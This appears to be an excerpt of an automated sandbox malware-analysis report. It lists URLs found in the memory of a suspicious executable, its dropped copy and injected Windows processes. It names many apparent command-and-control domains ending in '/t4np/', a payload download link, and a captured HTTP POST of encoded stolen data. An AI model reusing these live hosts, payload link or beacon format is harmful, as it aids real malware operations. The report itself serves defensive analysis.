          Source: SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/
          Source: SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000029FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCert
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.0000000002832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
          Source: Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000029FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrusted
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://instagram.com/casarpontocom
          Source: Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
          Source: SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000029FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000029FD000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.0000000002832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
          Source: SC_0017384.exe, 00000000.00000002.382705892.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.0000000002591000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000026DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.33347.net
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.33347.net/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.33347.netwww.33347.net
          Source: explorer.exe, 00000004.00000003.533668803.000000000ED27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.575675145.0000000000921000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.592015514.000000000ED28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.386129776.000000000091F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.babupaul.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.babupaul.com/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.babupaul.comwww.babupaul.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.brunaeleandro.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.brunaeleandro.com/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.brunaeleandro.comwww.brunaeleandro.com
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.emprendizajesocial.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.emprendizajesocial.com/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.emprendizajesocial.comwww.emprendizajesocial.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.evelycosmetique.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.evelycosmetique.com/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.evelycosmetique.comwww.evelycosmetique.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.findmyoriginstory.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.findmyoriginstory.com/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.findmyoriginstory.comwww.findmyoriginstory.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.funhood.life
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.funhood.life/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.funhood.lifewww.funhood.life
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.groupekoriolis.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.groupekoriolis.com/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.groupekoriolis.comwww.groupekoriolis.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.icste-conference.org
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.icste-conference.org/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.icste-conference.orgwww.icste-conference.org
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.madisoncountylincoln.com
          Source: explorer.exe, 00000004.00000002.594853816.00000000160EE000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005E0E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.madisoncountylincoln.com/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.madisoncountylincoln.com/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.madisoncountylincoln.comwww.madisoncountylincoln.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mejawajib.shop
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mejawajib.shop/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mejawajib.shopwww.mejawajib.shop
          Source: explorer.exe, 00000004.00000002.584502379.0000000006162000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.metatv.app
          Source: explorer.exe, 00000004.00000002.584502379.0000000006162000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.metatv.app/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.metatv.appwww.metatv.app
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mnsmanagmentsolutions.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mnsmanagmentsolutions.com/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mnsmanagmentsolutions.comwww.mnsmanagmentsolutions.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.myprojoints.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.myprojoints.com/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.myprojoints.comwww.myprojoints.com
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.pinterest.com/casarpontocom
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rw-bau.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rw-bau.com/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rw-bau.comwww.rw-bau.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sistemadanetflix.site
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sistemadanetflix.site/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sistemadanetflix.sitewww.sistemadanetflix.site
          Source: SC_0017384.exe, 00000000.00000002.382705892.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.0000000002591000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000026D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://a.uguu.se/fwvfviJb.dat
          Source: SC_0017384.exe, Lvdnyvcvr.exe.0.drString found in binary or memory: https://a.uguu.se/fwvfviJb.dat=
          Source: SC_0017384.exe, 00000000.00000002.382705892.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.0000000002591000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000026DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://a.uguu.se4Dp
          Source: M61Ae5o9b.8.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ajuda.casar.com
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://br.enterprise.wibson.io/banner.js?siteId=78509e00-767d-4326-9529-f0d523c8137c
          Source: M61Ae5o9b.8.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/es5-shim/4.5.14/es5-shim.min.js
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
          Source: M61Ae5o9b.8.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: M61Ae5o9b.8.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: M61Ae5o9b.8.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://embed.typeform.com/embed.js
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://plus.google.com/
          Source: M61Ae5o9b.8.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: M61Ae5o9b.8.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
          Source: M61Ae5o9b.8.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
          Source: M61Ae5o9b.8.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
          Source: SC_0017384.exe, 00000000.00000002.385968571.000000000419A000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.401744017.0000000006980000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://urn.to/r/sds_see5bad
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.casar.com
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.casar.com/assunto/casamentos/casamentos-reais/
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.casar.com/assunto/casamentos/decoracao-de-casamento/
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.casar.com/assunto/cha-de-panela/
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.casar.com/assunto/lua-de-mel-2/
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.casar.com/assunto/noivas/dicas-para-noivas/
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.casar.com/assunto/noivas/vestidos-de-noiva/
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.casar.com/assunto/organizacao/
          Source: M61Ae5o9b.8.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-N7Z9MZC
          Source: Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/json
          Source: Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/casarpontocom
          Source: unknownHTTP traffic detected: POST /t4np/ HTTP/1.1Host: www.emprendizajesocial.comConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.emprendizajesocial.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.emprendizajesocial.com/t4np/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 65 6b 44 57 64 58 6d 78 3d 74 53 67 53 46 6d 4e 55 59 35 38 65 4d 74 73 57 28 58 79 41 56 6c 64 6e 39 42 43 72 31 71 54 51 4f 42 64 6a 6d 49 44 54 4d 68 32 50 45 5a 4c 71 36 69 4d 32 64 4a 77 4c 36 38 32 47 5a 43 64 78 48 68 48 46 55 56 5a 5a 58 4e 70 61 59 45 52 61 28 74 4a 48 54 42 48 4e 59 5a 4b 68 56 73 68 45 79 6f 4d 30 5a 48 4a 59 56 54 6e 61 46 7a 4f 55 38 65 57 49 46 48 4a 63 6b 32 41 63 71 31 6e 62 6f 6c 33 44 77 6a 56 36 50 5a 46 42 33 5a 69 37 34 42 42 65 68 63 6e 44 7e 4b 41 56 6f 69 37 75 55 48 48 44 47 6d 62 76 41 4c 63 4a 36 45 64 55 4a 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ekDWdXmx=tSgSFmNUY58eMtsW(XyAVldn9BCr1qTQOBdjmIDTMh2PEZLq6iM2dJwL682GZCdxHhHFUVZZXNpaYERa(tJHTBHNYZKhVshEyoM0ZHJYVTnaFzOU8eWIFHJck2Acq1nbol3DwjV6PZFB3Zi74BBehcnD~KAVoi7uUHHDGmbvALcJ6EdUJQ).
